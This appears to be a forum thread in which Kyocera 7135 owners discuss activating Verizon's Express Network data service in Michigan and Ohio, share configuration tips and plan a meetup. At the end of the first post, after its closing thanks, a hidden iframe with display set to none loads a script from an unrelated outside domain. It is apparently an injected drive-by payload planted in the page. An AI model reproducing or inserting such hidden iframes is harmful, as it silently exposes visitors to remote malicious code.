+ Reply to Thread
    I-300 Novice

7135 Express Network Use in Michigan or Ohio

Help!

I spent the better part of an hour on the phone today with Verizon trying to get the Express Network portion of my service activated. The America's Choice program was activated with no problem.

After talking to two service reps, one tech rep and his supervisor (who is based in Ohio and covers the Michigan/Ohio territory for Verizon), Verizon is taking the position that they cannot connect me to the Express Network because their system is not set up to handle the 7135 on the Express Network in the Michigan/Ohio area.

I told the head of the Tech Department that there were hundreds of us who purchased the phones from the Kyocera and are using them on Express Network. He said that may be true, but there are none in Michigan or Ohio.

My simple question is....is there anyone in Michigan and/or Ohio who has a 7135 and is using it on Express Network?

If there is anyone in another Verizon territory who has any ideas on how I could get the Express Network activated through another Verizon territory or office, your help would be appreciated.

In either case, I could really use the help of the Verizon experts on this forum. Thanks!

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

I am in Cleveland, OH, and I use Express Network on my 7135. My corporate rep. activated the service with no problem and it worked like a charm immediately.

If you were using my FAQ for your network settings, go back and check the FAQ again. I had the password wrong, and another poster, bobbank, suggested a different script setting that he got from working with VZW.

He mentions that his son, in Ohio, is able to connect with these same settings.

Alan

I am in Michigan, near Lansing, and have been using what I think is Express Network (1X High Speed Data, right?) without difficulty. My Verizon store didn't even have a brochure to give me, hence (in part) my ignorance of terminology, but I think it's the same thing.

I too live near Lansing and was on EN for 1 day and then realize I couldn't benefit from the high speeds while accessing my corporate network so I cancelled. I am testing a VPN for my company so I will be signing up for unlimited real soon.

VZW told me to wait 24hrs before trying to access EN upon setup because they have to get all the setting right in their systems. How long has it been?

It may work when you get home tonight mine did.

Maybe we need to organize our own MI and OH crazies weekend. I think I remember reading that another 7135 owner is from Ann Arbor and one from Detroit. Depending on where our OH neighbors are located we might be able to meet in Detroit.

I-300 Novice
    Let me know and I'll be there!
    Ahmed V. Ismail
    A Smartphone Addict

I-300 Novice
    Alan was kind enough to direct me to his posting on 3G setup in the '7135 FAQ' forum.

Could the users from Michigan and/or Ohio check these settings against your settings and let me know if there are any differences?

Thanks!
    Ahmed V. Ismail
    A Smartphone Addict

I'm in Cleveland only 3 hrs from Detroit. Just let me know and I'll be there. How about Toledo?

I-300 Novice
    You guys call it....Detroit, Toledo, Ann Arbor...it would be great to meet all of the gurus on this site in the area!
    Ahmed V. Ismail
    A Smartphone Addict